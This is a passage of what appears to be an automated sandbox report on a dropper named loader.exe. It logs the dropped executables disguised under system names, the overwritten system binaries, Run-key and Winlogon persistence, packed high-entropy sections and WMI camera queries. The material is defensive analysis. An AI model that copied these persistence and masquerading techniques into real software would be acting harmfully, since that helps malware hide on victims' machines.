                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: uxtheme.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: windows.storage.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wldp.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: profapi.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptsp.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: rsaenh.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptbase.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: version.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: version.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: version.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: loader.exeStatic file information: File size 3314471 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe, loader.exe, 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    Source: C:\Users\user\Desktop\loader.exeUnpacked PE file: 0.2.loader.exe.630000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeFile created: C:\ServerWinRuntimeBroker\__tmp_rar_sfx_access_check_5798765Jump to behavior
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name: cheat
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006681CD push esi; ret 0_2_006681D6
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064F640 push ecx; ret 0_2_0064F653
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064EB78 push eax; ret 0_2_0064EB96
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC104 push ecx; mov dword ptr [esp], edx0_2_006DC109
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC32C push ecx; mov dword ptr [esp], edx0_2_006DC331
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C83EA push 006C8418h; ret 0_2_006C8410
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D93A0 push 006D9400h; ret 0_2_006D93F8
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC448 push ecx; mov dword ptr [esp], edx0_2_006DC44D
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C845C push 006C8488h; ret 0_2_006C8480
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DA454 push 006DA4A1h; ret 0_2_006DA499
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8424 push 006C8450h; ret 0_2_006C8448
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D0424 push 006D06D8h; ret 0_2_006D06D0
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C84F8 push 006C852Ch; ret 0_2_006C8524
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC48C push ecx; mov dword ptr [esp], edx0_2_006DC491
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8494 push 006C84C0h; ret 0_2_006C84B8
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DE54C push ecx; mov dword ptr [esp], edx0_2_006DE54D
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D9548 push 006D95A4h; ret 0_2_006D959C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D8536 push 006D85B5h; ret 0_2_006D85AD
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C65F0 push 006C6641h; ret 0_2_006C6639
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D762C push 006D76A2h; ret 0_2_006D769A
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D06DA push 006D074Bh; ret 0_2_006D0743
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D76A4 push 006D774Ch; ret 0_2_006D7744
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D9684 push ecx; mov dword ptr [esp], ecx0_2_006D9687
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D774E push 006D779Ch; ret 0_2_006D7794
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8738 push 006C885Ch; ret 0_2_006C8854
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D085E push 006D088Ch; ret 0_2_006D0884
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D8804 push 006D8830h; ret 0_2_006D8828
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D98F4 push ecx; mov dword ptr [esp], ecx0_2_006D98F6
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C68AA push 006C68D8h; ret 0_2_006C68D0
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C6968 push 006C6994h; ret 0_2_006C698C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C7A48 push ecx; mov dword ptr [esp], eax0_2_006C7A49
                                    Source: loader.exeStatic PE information: section name: entropy: 7.9966173970846315
                                    Source: loader.exeStatic PE information: section name: entropy: 7.980672042041817
                                    Source: loader.exeStatic PE information: section name: entropy: 7.4680767408434345
                                    Source: loader.exeStatic PE information: section name: entropy: 7.940310001309214
                                    Source: loader.exeStatic PE information: section name: entropy: 7.847280090655699
                                    Source: loader.exeStatic PE information: section name: .rsrc entropy: 7.86163703105012
                                    Source: loader.exeStatic PE information: section name: cheat entropy: 7.983850693923614
                                    Source: chainPorthostCommon.exe.0.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: tQESKTdysPpsVzUyXTE.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: conhost.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: dasHost.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: csrss.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: RuntimeBroker.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596

                                    Persistence and Installation Behavior

                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Program Files (x86)\Microsoft\csrss.exeJump to dropped file
                                    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to behavior
                                    Source: unknownExecutable created and started: C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                    Source: unknownExecutable created and started: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\ZPhRdffT.logJump to dropped file
                                    Source: C:\Users\user\Desktop\loader.exeFile created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\PHEbWhMM.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\SSuSBQke.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\OTzTkTQO.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\pOvooSqL.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\BLdnhdFQ.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\kmFpzVgz.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\JgiUHXBa.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\XCTiUwVw.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\keVXUmFt.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\DiagTrack\Scenarios\dasHost.exeJump to dropped file

                                    Boot Survival

                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTEJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
